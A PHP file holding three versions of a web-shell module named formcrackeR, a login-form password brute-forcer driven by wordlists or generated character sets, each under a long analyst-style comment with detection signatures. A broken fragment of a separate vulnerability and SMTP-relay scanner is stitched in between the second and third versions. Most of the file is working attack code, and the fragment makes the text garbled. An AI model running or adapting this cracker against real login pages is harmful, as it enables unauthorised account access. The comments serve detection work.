/**
 * HTTP login-form credential guesser driven by a server-side wordlist.
 *
 * Reviewer annotation (defensive): every setting is read from $_REQUEST and
 * the function performs no authentication or validation of its own. It
 * appears to be one module of a larger PHP web shell; the helpers it calls
 * (check_urL, file_add_contentS, whereistmP) are defined outside this view.
 *
 * Flow, as visible in the code:
 *  - When $_REQUEST['start'] is empty, only the HTML configuration form is
 *    echoed. Its defaults point at http://<HTTP_HOST>/login.php and at a log
 *    file named ".log" under the directory returned by whereistmP().
 *  - Otherwise the file named by $_REQUEST['dictionary'] is opened for
 *    reading; if it does not exist the script die()s with
 *    "Can not open dictionary.".
 *  - Each line is trimmed of spaces, CR and LF. With $_REQUEST['combo'] truthy
 *    the line is split at the first ':' into user and password; otherwise the
 *    line is the password and $_REQUEST['user'] supplies the user.
 *  - "?<userf>=<user>&<passf>=<pass>&<submitf>=<submitv>" is appended to $url
 *    and the result is passed to check_urL($url, $method, $fail, 12). A falsy
 *    return is treated as a hit. NOTE(review): the fourth argument is
 *    presumably a timeout in seconds; confirm against the helper.
 *  - A hit is echoed and, when both 'loG' and 'logfilE' were supplied, handed
 *    to file_add_contentS($file, ...). In single-password mode the loop stops
 *    at the first hit; in combo mode it runs to end of file.
 *
 * Points relevant to detection and triage:
 *  - $url is assigned once before the loop and extended with .= on every
 *    iteration, so successive request URLs each carry one more query string.
 *  - The dictionary and log paths are used exactly as received, so the
 *    function reads from and writes to any path the PHP process can reach.
 *  - $user, $pass and getenv('HTTP_HOST') are written into the HTML output
 *    without escaping.
 *  - Distinctive strings for signatures: the request keys 'loG' and
 *    'logfilE', and the trailing-capital names formcrackeR, check_urL,
 *    file_add_contentS and whereistmP.
 */
function formcrackeR() { global $errorbox, $footer, $et, $hcwd; if (!empty($_REQUEST['start'])) { if (isset($_REQUEST['loG']) && !empty($_REQUEST['logfilE'])) { $log = 1; $file = $_REQUEST['logfilE']; } else { $log = 0; } $url = $_REQUEST['target']; $uf = $_REQUEST['userf']; $pf = $_REQUEST['passf']; $sf = $_REQUEST['submitf']; $sv = $_REQUEST['submitv']; $method = $_REQUEST['method']; $fail = $_REQUEST['fail']; $dic = $_REQUEST['dictionary']; $type = $_REQUEST['combo']; $user = !empty($_REQUEST['user']) ? $_REQUEST['user'] : ''; if (!file_exists($dic)) { die("{$errorbox} Can not open dictionary.{$et}{$footer}"); } $dictionary = fopen($dic, 'r'); echo '<font color=blue>Cracking started...<br>'; while (!feof($dictionary)) { if ($type) { $combo = trim(fgets($dictionary), " \n\r"); $user = substr($combo, 0, strpos($combo, ':')); $pass = substr($combo, strpos($combo, ':') + 1); } else { $pass = trim(fgets($dictionary), " \n\r"); } $url .= "?{$uf}={$user}&{$pf}={$pass}&{$sf}={$sv}"; $res = check_urL($url, $method, $fail, 12); if (!$res) { echo "<font color=blue>U: {$user} P: {$pass}</font><br>"; if ($log) { file_add_contentS($file, "U: {$user} P: {$pass}\r\n"); } if (!$type) { break; } } } fclose($dictionary); echo 'Done!</font><br>'; } else { echo "<center><table border=0 style='border-collapse: collapse' width='434'><tr><td width='174' bgcolor='#333333'>HTTP Form cracker:</td><td bgcolor='#333333' width='253'></td></tr><form method='POST' name=form><tr><td width='174' bgcolor='#666666'>Dictionary:</td><td bgcolor='#666666' width='253'><input type=text name=dictionary size=35></td></tr><tr><td width='174' bgcolor='#808080'>Dictionary type:</td><td bgcolor='#808080'><input type=radio name=combo checked value=0 onClick='document.form.user.disabled = false;' style='border-width:1px;background-color:#808080;'>Simple (P)<input type=radio value=1 name=combo onClick='document.form.user.disabled = true;' style='border-width:1px;background-color:#808080;'>Combo 
(U:P)</td></tr><tr><td width='174' bgcolor='#666666'>Username:</td><td bgcolor='#666666'><input type=text size=35 value=root name=user>{$hcwd}</td></tr><tr><td width='174' bgcolor='#808080'>Action Page:</td><td bgcolor='#808080' width='253'><input type=text name=target value='http://" . getenv('HTTP_HOST') . "/login.php' size=35></td></tr><tr><td width='174' bgcolor='#666666'>Method:</td><td bgcolor='#666666' width='253'><select size='1' name='method'><option selected value='POST'>POST</option><option value='GET'>GET</option></select></td></tr><tr><td width='174' bgcolor='#808080'>Username field name:</td><td bgcolor='#808080' width='253'><input type=text name=userf value=user size=35></td></tr><tr><td width='174' bgcolor='#666666'>Password field name:</td><td bgcolor='#666666' width='253'><input type=text name=passf value=passwd size=35></td></tr><tr><td width='174' bgcolor='#808080'>Submit name:</td><td bgcolor='#808080' width='253'><input type=text value=login name=submitf size=35></td></tr><tr><td width='174' bgcolor='#666666'>Submit value:</td><td bgcolor='#666666' width='253'><input type=text value='Login' name=submitv size=35></td></tr><tr><td width='174' bgcolor='#808080'>Fail string:</td><td bgcolor='#808080' width='253'><input type=text name=fail value='Try again' size=35></td></tr><tr><td width='174' bgcolor='#666666'><input type=checkbox name=loG value=1 onClick='document.form.logfilE.disabled = !document.form.logfilE.disabled;' style='border-width:1px;background-color:#666666;' checked>Log</td><td bgcolor='#666666'><input type=text name=logfilE size=25 value='" . whereistmP() . DIRECTORY_SEPARATOR . ".log'> <input class=buttons type=submit name=start value=Start></form>{$et}</center>"; } }
/**
 * HTTP login-form credential guesser with a wordlist mode and a generated
 * candidate mode.
 *
 * Reviewer annotation (defensive): every setting is read from $_REQUEST and
 * the function performs no authentication or validation of its own. It
 * appears to be one module of a larger PHP web shell; check_urL, brute,
 * flush_buffers, file_add_contentS, whereistmP and the JavaScript toggle()
 * are all defined outside this view.
 *
 * Flow, as visible in the code:
 *  - When $_REQUEST['start'] is empty, only the HTML configuration form is
 *    echoed. Its defaults point at http://<HTTP_HOST>/login.php and at a log
 *    file named ".log" under the directory returned by whereistmP(). The
 *    form shown here has no 'min' or 'max' inputs although the handler reads
 *    both; they must be supplied by markup or script outside this function.
 *  - $_REQUEST['mode'] == 'wl' (loose comparison) selects wordlist mode: the
 *    file named by $_REQUEST['dictionary'] is opened and each trimmed line is
 *    used as the password, or split at the first ':' into user and password
 *    when $_REQUEST['combo'] is truthy. $dic is only assigned when a
 *    dictionary value was sent, so an empty value reaches fopen() with an
 *    undefined variable and ends in "Can not open dictionary.".
 *  - $url is reset from $_REQUEST['target'] on every iteration before the
 *    query string is appended and passed to check_urL($url, $method, $fail,
 *    12). A falsy return is treated as a hit. NOTE(review): the fourth
 *    argument is presumably a timeout in seconds; confirm against the helper.
 *  - Any other mode builds $code, a string of PHP source that assigns $test
 *    from a negated check_urL() call with a literal $word in the password
 *    position, and passes it to brute() together with the mode, 'min' and
 *    'max' values. NOTE(review): brute() presumably evaluates $code once per
 *    generated candidate; confirm against its definition.
 *  - Hits are echoed and, when both 'loG' and 'logfilE' were supplied, handed
 *    to file_add_contentS($file, ...).
 *
 * Points relevant to detection and triage:
 *  - The target, field names, submit value, method and fail string are
 *    concatenated into $code with no escaping. If brute() does evaluate it,
 *    request data becomes part of executed PHP source.
 *  - The dictionary and log paths are used exactly as received, so the
 *    function reads from and writes to any path the PHP process can reach.
 *  - $user, $pass, $res and getenv('HTTP_HOST') are written into the HTML
 *    output without escaping.
 *  - The call to flush_buffers() is prefixed with @, so its errors are
 *    suppressed.
 *  - Distinctive strings for signatures: the request keys 'loG' and
 *    'logfilE', the mode values '09', 'az', 'az09', 'az09AZ', 'all' and 'wl',
 *    and the trailing-capital names formcrackeR, check_urL,
 *    file_add_contentS and whereistmP.
 */
function formcrackeR() { global $hcwd; if (!empty($_REQUEST['start'])) { if (isset($_REQUEST['loG']) && !empty($_REQUEST['logfilE'])) { $log = 1; $file = $_REQUEST['logfilE']; } else { $log = 0; } $uf = $_REQUEST['userf']; $pf = $_REQUEST['passf']; $sf = $_REQUEST['submitf']; $sv = $_REQUEST['submitv']; $method = $_REQUEST['method']; $fail = $_REQUEST['fail']; if (!empty($_REQUEST['dictionary'])) { $dic = $_REQUEST['dictionary']; } $type = $_REQUEST['combo']; $user = !empty($_REQUEST['user']) ? $_REQUEST['user'] : ''; if ($_REQUEST['mode'] == 'wl') { $dictionary = fopen($dic, 'r'); if ($dictionary) { echo '<font color=#FA0>Cracking...<br>'; while (!feof($dictionary)) { $url = $_REQUEST['target']; if ($type) { $combo = trim(fgets($dictionary), " \n\r"); $user = substr($combo, 0, strpos($combo, ':')); $pass = substr($combo, strpos($combo, ':') + 1); } else { $pass = trim(fgets($dictionary), " \n\r"); } $url .= "?{$uf}={$user}&{$pf}={$pass}&{$sf}={$sv}"; $res = check_urL($url, $method, $fail, 12); if (!$res) { echo "<font color=#FA0>U: {$user} P: {$pass}</font><br>"; if ($log) { file_add_contentS($file, "U: {$user} P: {$pass}\r\n"); } if (!$type) { break; } } } fclose($dictionary); } else { echo "Can not open dictionary."; } } else { $code = '$test=!check_urL("' . $_REQUEST['target'] . '?' . $uf . '=' . $user . '&' . $pf . '=$word&' . $sf . '=' . $sv . '","' . $method . '","' . $fail . 
'",12);'; @flush_buffers(); if ($res = brute($_REQUEST['mode'], $_REQUEST['min'], $_REQUEST['max'], $code)) { echo "<b>{$user}:{$res}</b><br />"; if ($log) { file_add_contentS($file, "U: {$user} P: {$res}\r\n"); } } } echo 'Done!</font><br>'; } else { echo '<form name=cracker method="POST"> <div class="fieldwrapper"> <label class="styled" style="width:320px">HTTP Form cracker</label> </div> <div class="fieldwrapper"><label class="styled">Input:</label><div class="thefield"> <select name="mode" id="mode" onChange="toggle()"> <option value="09">Bruteforce [0-9]</option> <option value="az">Bruteforce [a-z]</option> <option value="az09">Bruteforce [a-z] [0-9]</option> <option value="az09AZ">Bruteforce [a-z] [A-Z] [0-9]</option> <option value="all">Bruteforce [ALL]</option> <option value="wl">Wordlist</option> </select> </div></div> <div class="fieldwrapper" id="dic"> <label class="styled">Dictionary:</label> <div class="thefield"> <input type="text" name="dictionary" size="30" /> </div> </div> <div class="fieldwrapper" id="fcr"> <label class="styled">Dictionary type:</label> <div class="thefield"> <ul style="margin-top:0;"> <li><input type="radio" value="0" checked name="combo" onClick="document.cracker.user.disabled = false;" /> <label>Simple (P)</label></li> <li><input type="radio" name="combo" value="1" onClick="document.cracker.user.disabled = true;" /> <label>Combo (U:P)</label></li> </ul> </div> </div><div class="fieldwrapper"> <label class="styled">Username:</label> <div class="thefield"> <input type="text" name="user" value="admin" size="30" /> </div> </div><div class="fieldwrapper"> <label class="styled">Action:</label> <div class="thefield"> <input type="url" name="target" value="http://' . getenv('HTTP_HOST') . 
'/login.php" size="30" /> </div> </div><div class="fieldwrapper"> <label class="styled">Method:</label> <div class="thefield"> <select name="method"><option selected value="POST">POST</option><option value="GET">GET</option></select> </div> </div><div class="fieldwrapper"> <label class="styled">Username field:</label> <div class="thefield"> <input type="text" name="userf" value="username" size="30" /> </div> </div><div class="fieldwrapper"> <label class="styled">Password field:</label> <div class="thefield"> <input type="text" name="passf" value="passwd" size="30" /> </div> </div><div class="fieldwrapper"> <label class="styled">Submit name:</label> <div class="thefield"> <input type="text" name="submitf" value="submit" size="30" /> </div> </div><div class="fieldwrapper"> <label class="styled">Submit value:</label> <div class="thefield"> <input type="text" name="submitv" value="Login" size="30" /> </div> </div><div class="fieldwrapper"> <label class="styled">Fail string:</label> <div class="thefield"> <input type="text" name="fail" value="Try again" size="30" /> </div> </div><div class="fieldwrapper"> <label class="styled"><input type=checkbox name=loG value=1 onClick="document.cracker.logfilE.disabled = !document.cracker.logfilE.disabled;" checked> Log:</label> <div class="thefield"> <input type=text name=logfilE size=25 value="' . whereistmP() . DIRECTORY_SEPARATOR . '.log"> </div> </div> ' . $hcwd . ' <div class="buttonsdiv"> <input type="submit" name="start" value="Start" style="margin-left: 150px;" /> </div> </form><script type="text/JavaScript"> toggle(); </script>'; } }
flusheR(); } } elseif (strstr($page, '@NUKE')) { foreach ($nuke as $cg) { $nukech = str_replace('@NUKE', $cg, $page); $url = "http://{$ip}{$nukech}"; $res = check_urL($url, $vuln[3], $vuln[2], $timeout); if ($res) { $output = 1; echo "{$ip})" . $vuln[4] . " <a href=\"{$url}\" target=\"_blank\">{$url}</a><br>"; } flusheR(); } } else { $url = "http://{$ip}{$page}"; $res = check_urL($url, $vuln[3], $vuln[2], $timeout); if ($res) { $output = 1; echo "{$ip})" . $vuln[4] . " <a href=\"{$url}\" target=\"_blank\">{$url}</a><br>"; } flusheR(); } } } } if (!empty($_REQUEST['smtprelay'])) { if (checkthisporT($ip, 25, $timeout)) { $res = ''; $res = checksmtP($ip, $timeout); if ($res == 1) { echo "{$ip}) SMTP relay found.<br>";
/**
 * HTTP login-form credential guesser driven by a server-side wordlist,
 * without result logging.
 *
 * Reviewer annotation (defensive): every setting is read from $_REQUEST and
 * the function performs no authentication or validation of its own. It
 * appears to be one module of a larger PHP web shell; check_urL and flusheR
 * are defined outside this view.
 *
 * Flow, as visible in the code:
 *  - When $_REQUEST['start'] is empty, only the HTML configuration form is
 *    echoed, with a default target of http://<HTTP_HOST>/login.php.
 *  - Otherwise the file named by $_REQUEST['dictionary'] is opened for
 *    reading; if it does not exist the script die()s with
 *    "Can not open dictionary.".
 *  - Each line is trimmed of spaces, CR and LF. With $_REQUEST['combo'] truthy
 *    the line is split at the first ':' into user and password; otherwise the
 *    line is the password and $_REQUEST['user'] supplies the user.
 *  - "?<userf>=<user>&<passf>=<pass>&<submitf>=<submitv>" is appended to $url
 *    and the result is passed to check_urL($url, $method, $fail, 12). A falsy
 *    return is treated as a hit. NOTE(review): the fourth argument is
 *    presumably a timeout in seconds; confirm against the helper.
 *  - A hit is echoed to the response only; nothing is written to disk by this
 *    function. flusheR() is called after every attempt. NOTE(review): it
 *    presumably flushes output so results stream to the browser; confirm.
 *  - In single-password mode the loop stops at the first hit; in combo mode
 *    it runs to end of file.
 *
 * Points relevant to detection and triage:
 *  - $url is assigned once before the loop and extended with .= on every
 *    iteration, so successive request URLs each carry one more query string.
 *  - The dictionary path is used exactly as received, so the function reads
 *    any file the PHP process can reach.
 *  - $user, $pass and getenv('HTTP_HOST') are written into the HTML output
 *    without escaping.
 *  - Distinctive strings for signatures: the trailing-capital names
 *    formcrackeR, check_urL and flusheR, and the form title
 *    "HTTP Form cracker:".
 */
function formcrackeR() { global $errorbox, $footer, $et, $hcwd; if (!empty($_REQUEST['start'])) { $url = $_REQUEST['target']; $uf = $_REQUEST['userf']; $pf = $_REQUEST['passf']; $sf = $_REQUEST['submitf']; $sv = $_REQUEST['submitv']; $method = $_REQUEST['method']; $fail = $_REQUEST['fail']; $dic = $_REQUEST['dictionary']; $type = $_REQUEST['combo']; $user = !empty($_REQUEST['user']) ? $_REQUEST['user'] : ""; if (!file_exists($dic)) { die("{$errorbox} Can not open dictionary.{$et}{$footer}"); } $dictionary = fopen($dic, 'r'); echo "<font color=blue>Cracking started...<br>"; while (!feof($dictionary)) { if ($type) { $combo = trim(fgets($dictionary), " \n\r"); $user = substr($combo, 0, strpos($combo, ':')); $pass = substr($combo, strpos($combo, ':') + 1); } else { $pass = trim(fgets($dictionary), " \n\r"); } $url .= "?{$uf}={$user}&{$pf}={$pass}&{$sf}={$sv}"; $res = check_urL($url, $method, $fail, 12); if (!$res) { echo "<font color=blue>U: {$user} P: {$pass}</font><br>"; flusheR(); if (!$type) { break; } } flusheR(); } fclose($dictionary); echo "Done!</font><br>"; } else { echo "<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"434\"><tr><td width=\"174\" bgcolor=\"#333333\">HTTP Form cracker:</td><td bgcolor=\"#333333\" width=\"253\"></td></tr><form method=\"POST\" name=form><tr><td width=\"174\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\" width=\"253\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Dictionary type:</td><td bgcolor=\"#808080\"><input type=radio name=combo checked value=0 onClick=\"document.form.user.disabled = false;\" style=\"border-width:1px;background-color:#808080;\">Simple (P)<input type=radio value=1 name=combo onClick=\"document.form.user.disabled = true;\" style=\"border-width:1px;background-color:#808080;\">Combo (U:P)</td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Username:</td><td bgcolor=\"#666666\"><input type=text size=35 
value=root name=user>{$hcwd}</td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Action Page:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text name=target value=\"http://" . getenv('HTTP_HOST') . "/login.php\" size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Method:</td><td bgcolor=\"#666666\" width=\"253\"><select size=\"1\" name=\"method\"><option selected value=\"POST\">POST</option><option value=\"GET\">GET</option></select></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Username field name:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text name=userf value=user size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Password field name:</td><td bgcolor=\"#666666\" width=\"253\"><input type=text name=passf value=passwd size=35></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Submit name:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text value=login name=submitf size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Submit value:</td><td bgcolor=\"#666666\" width=\"253\"><input type=text value=\"Login\" name=submitv size=35></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Fail string:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text name=fail value=\"Try again\" size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right width=\"253\"><input class=buttons type=submit name=start value=Start></td></tr></form></table></center>"; } }